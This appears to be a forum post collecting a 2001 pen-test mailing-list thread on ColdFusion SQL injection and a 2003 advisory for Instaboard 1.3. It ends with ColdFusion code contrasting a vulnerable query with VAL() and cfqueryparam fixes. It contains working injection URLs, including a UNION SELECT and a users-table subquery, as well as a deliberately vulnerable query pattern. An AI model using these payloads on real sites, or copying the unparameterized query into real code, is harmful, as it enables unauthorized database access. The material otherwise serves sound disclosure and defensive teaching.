CFM SQL injection

Heh, this is basically the same as with ASP, but it depends on which platform is behind the page.

There are two documents here, both presented in question-and-answer form. I've noticed that computing material from abroad, whether teaching or articles, is far more humorous than the teaching we get here, which makes it much easier to learn. Ah, when will things change here? Probably never, sigh!
Quote
It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a web site with ColdFusion installed. I
> obtain some error information, but I'm not able to do anything because the
> server never understands the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8&#39;
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
> of (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:/blabla/page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
> It seems that it is not an SQL issue; instead it looks like a ColdFusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
> of (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, I get an error from the SQL database, but I still don't know how to
> take advantage of it. I don't know the database name and I have very little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request: http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
> of (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
> of (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
Quote
Affected Product: NetPleasure's Instaboard 1.3
www.netpleasure.com/instaboard/

Vulnerability: Multiple SQL Injection Vulnerabilities.

http://server/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://server/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://server/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://server/instaboard/index.cfm?catid=1%20SQL

Notification:
Messages were posted on the Instaboard demo forum, in the "Instaboard 1.3
Troubleshooting and Problems" area, on April 02 2003. As of yet, there has
been no reply publicly or privately from the author. Author emailed at
instaboard at netpleasure.com on Tue, 8 Apr 2003 16:06:19 -0400

Proposed Solution:
If you have the licensed version of the product, protect the numerical
values within the CFQUERY tags:

for example:
In queries/oraclen/qry_GetOriginalMessage.cfm
change
WHERE m.tpcid = #tpcid#
AND m.userid = u.userid
AND m.msgid = #msgid#

to

WHERE m.tpcid = #VAL(tpcid)#
AND m.userid = u.userid
AND m.msgid = #VAL(msgid)#

--
"Most moms teach their daughters how to run a house, but you? You teach
yours the fine art of mass destruction."
- Nabs - Goodbye is not forever

perl -le '$_="6110>374086;2064208213:90<307;55";tr[0->][ LEOR!AUBGNSTY];print'
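Putting the advisory's VAL() fix next to the unquoted-number pattern Kevin describes, as an added ColdFusion example that is neither Instaboard's code nor taken from either list post. The datasource name, table names, the url.-scoped variable names and the extra columns are assumptions; only m.tpcid, m.userid, u.userid and m.msgid come from the advisory. It also shows cfqueryparam, the typed-binding alternative to VAL().

```cfml
<!--- Added example (not Instaboard's code). Datasource, table and column
      names other than m.tpcid / m.userid / u.userid / m.msgid are assumed. --->

<!--- Vulnerable form: the URL value is pasted straight into an unquoted
      numeric predicate, so whatever follows the number becomes SQL and no
      quote character is needed to break out (cf. page_id=3,4 above). --->
<cfquery name="getOriginalMessage" datasource="instaboard">
    SELECT m.msgid, m.subject, m.body, u.username
    FROM   messages m, users u
    WHERE  m.tpcid  = #url.tpcid#
    AND    m.userid = u.userid
    AND    m.msgid  = #url.msgid#
</cfquery>

<!--- Mitigation proposed in the advisory: VAL() returns the leading number
      of the string (VAL("3,4") is 3, VAL("1 AND ...") is 1), so only a
      number ever reaches the SQL text. --->
<cfquery name="getOriginalMessage" datasource="instaboard">
    SELECT m.msgid, m.subject, m.body, u.username
    FROM   messages m, users u
    WHERE  m.tpcid  = #VAL(url.tpcid)#
    AND    m.userid = u.userid
    AND    m.msgid  = #VAL(url.msgid)#
</cfquery>

<!--- Preferred form: bind each value as a typed parameter instead of
      interpolating it. cf_sql_integer rejects "3,4" or "8'" at bind time
      rather than silently truncating, and the SQL text never changes. --->
<cfquery name="getOriginalMessage" datasource="instaboard">
    SELECT m.msgid, m.subject, m.body, u.username
    FROM   messages m, users u
    WHERE  m.tpcid  = <cfqueryparam value="#url.tpcid#" cfsqltype="cf_sql_integer">
    AND    m.userid = u.userid
    AND    m.msgid  = <cfqueryparam value="#url.msgid#" cfsqltype="cf_sql_integer">
</cfquery>
```

The VAL() form stops injection but silently accepts malformed input; the cfqueryparam form both stops it and turns malformed input into a visible error, which is the event worth logging.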